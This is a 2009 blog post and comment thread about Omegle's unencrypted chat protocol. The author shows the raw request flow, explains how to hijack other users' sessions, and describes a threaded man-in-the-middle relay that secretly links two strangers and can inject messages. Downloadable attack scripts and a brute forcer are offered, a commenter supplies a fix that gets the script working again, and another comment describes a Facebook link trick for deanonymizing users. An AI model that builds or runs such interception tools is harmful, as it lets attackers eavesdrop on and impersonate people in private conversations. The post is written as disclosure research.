Saturday, November 14, 2009

Omegle.com Man In The Middle Attack

The other day my friend showed me this site Omegle. It's a pretty cool site that anonymously pairs you up with a 'stranger' and you chat 1 on 1 with the ability to disconnect and find a new 'stranger' at any time. It's surprisingly addicting and fun. It claims to be completely anonymous and so to check this I decided to fire up Wireshark and take a look at what information was getting passed to the server. I was surprised to find the method of communication extremely simple and completely unencrypted. When you connect to a person the process looks like this:

You: POST omegle.com/start
Omg: HTTP "123456" <-- random 6 digit 'username' (a-z A-Z 0-9 _ -)
You: POST omegle.com/events?id=123456
Omg: HTTP [["connected"]]
You: POST omegle.com/send?msg=hello&id=123456
Omg: HTTP win <-- funny
You: POST omegle.com/events?id=123456
Omg: HTTP [["gotMessage", "hey"]] <-- message from other person
...
You: POST omegle.com/disconnect?id=123456 <-- quit the chat


Seeing this immediately sparked some thought. Can I request events for other users? Can I send messages to other users? Can I disconnect other users? It seemed all you needed to do was post the command with the user id you wanted to receive events for. As it turns out its almost even better. If you post for events using someone elses user id it will "implode" their chat:

Screenshot


Whats better is that the other person is still connected and they have no idea that their 'stranger' has been imploded. Now you can keep talking to the other person and they have no idea what just happened.

There is one major problem with this however. According to:

http://omegle.com/count

there are on average only about 3k users online at a given time, but the number of possible user ids are

(26+26+10+1+1)^6 = 68,719,476,736

That is a terrible chance of you finding someone quickly. I actually started making a brute forcer (omegle_brute_force.py) but quickly realized that this was an ill fated attempted.

So if you cant find the users, why not have the users come to you? I realized that Omegle would be prime for a classic man in the middle attack. The idea is super simple. I would connect to two strangers just like normal, but instead of me talking to them they would talk to each other through me. As long as I don't inject any messages or anything weird they should have no idea that I'm even there. Here is how the program looks:

omegle


As you can see I am having a legit connection to both client 1 and client 2, but I am transparently passing their messages right through me to the other person.

Doing this was kinda tricky. Whenever you POST for events it blocks until the read is fulfilled. This means that with a single threaded program each person would have to take turns talking since the program would block every time I polled for their messages. Even most two threaded setups have the same problem. The solution I came up with I feel works pretty well. There are four total threads:

1) Sending to client 1
2) Receiving from client 1
3) Sending to client 2
4) Receiving from client 2

Every time the receive thread gets a message it queues it into a stack, so that the sending thread can retrieve the message at its leisure. The result? It doesn't matter if a POST blocks because the sender thread can still work through the queue and the other threads can still send and receive messages.

A classic man in the middle attack:

Screenshot-2

This has some interesting possibilities. I can send messages to one of the clients at the others behalf and the person will have no idea that I sent it. Also what about connecting more then 2 people together? There is no reason I couldn't connect multiple people together in a chat and maybe even append a user tag to each of their messages.

Omegle is a pretty interesting site, and you gotta hand it to Leif K-Brooks for (apparently) single handedly making such a propular site at only 18. I hope that he can implement some needed security to Omegle to prevent this kind of attack in the future.

Download my programs here [mirror].

omegle_man_in_middle.py - program described above
omegle_brute_force.py - attempts to guess user ids and post for events
omegle_class.py - generic class for interacting with omegle
omegle_connect_view.py - connect to omegle and posts for events
omegle_multi_connect.py - connects to multiple people at once. proof of concept that multi connections can be made
omegle_send.py - send messages using a user id

EDIT:

Found another omegle man in the middle attack written in perl [here]

15 comments:

  1. very very interesting ,, gr8 article

    ReplyDelete
  2. hi, seems that link to ur python scripts doesn't work anymore :( could u please reupload it?

    ReplyDelete
  3. @anon

    Sorry idk what's going on with my schools hosting it put up a mirror

    ReplyDelete
  4. thanx for quick reaction ;) but...i dunno if problem is with my connection... it throws me HTTP 101 ERR_CONNECTION_RESET on that mirror :(

    ReplyDelete
  5. @anon

    Opps! Sorry had the wrong port in the link, try it now it should be good

    ReplyDelete
  6. thx a lot man... i was trying to make js web client which would connect to omegle and have this nice features... but looks like i'm stuck with limitation, that XMLHTTPRequests can be sent only to your own domain... maybe i'll solve it... dunno :) but for now i'm giving up i quess...

    ReplyDelete
  7. really great and useful article , Keep up the good work ;-)

    ReplyDelete
  8. Max
    Omegle has changed slightly and the scripts are broken.
    I fixed omegle_man_in_middle.py thus:


    params_start = urlencode({'rcs':"1",'spid':''})
    con_one.request("POST", "/start", params_start, headers)
    con_two.request("POST", "/start", params_start, headers)

    I don't know if those parameters were ever used on omegle before but they are necessary now. The site has added a video chat feature, this may be the reason.

    Also note that a GET request to start also returns an ID; so you could just use

    con_one.request("GET", "/start", 0, headers)

    etc

    ReplyDelete
  9. hey very informative article here. I was on omegle and some son of a bitch found out my facebook username. any idea how they did that? is it even possible theoretically? or am I more likely dealing with a script kiddie who I personally know and has a grudge against me?

    ReplyDelete
  10. The SOB didn't really find out your user name, though it can rattle your nerves when they do that! I spent a bit of time looking into the possibilities, and unlike chatroulette (which does connect users directly and thus exposes your outward facing IP address), all communication on omegle is between you and omegle's system. There isn't anything that you don't type that the person on the other end can get.

    As for how it was done, it's an 'exploit' of the fact that if a user (you in this case) is logged into FaceBook in another tab, in the same browser, and select a link that is of the form

    http://www.facebook.com/profile.php?id=2018293050400

    Facebook will present the user's own profile page. If the user is not logged into Facebook, then the login page is displayed. Everything from the question mark and right is fluff that is ignored, but makes it look like the person found a legit link.

    Rest easy and know that your computer wasn't accessed (this time). In general, it's just as risky to click on links that are sent to you via omegle as it would be to click on something sent to you in an email.

    Have a great day!

    ReplyDelete
  11. Similar idea; http://kitakitsune.org/texty/rc0d3z/omegleProxy.html

    ReplyDelete
  12. do you know omegle chat script>?for developing a chat website..

    ReplyDelete
  13. I wonder if you fixed your script for their new updates?

    ReplyDelete
  14. Was wondering the same thing :P just discovered this. I found the problem wasnt connecting or receiving messages. It was parsing them "through" me to the opposite user. What happens is I receive all the messages but the other person never receives his/her reply. I may fix this myself if you wouldnt mind.

    ReplyDelete
  15. Dear Bear24rw.
    I think you should consider using apostrophes in your contributions. They would make you appear a lot more intelligent.

    ReplyDelete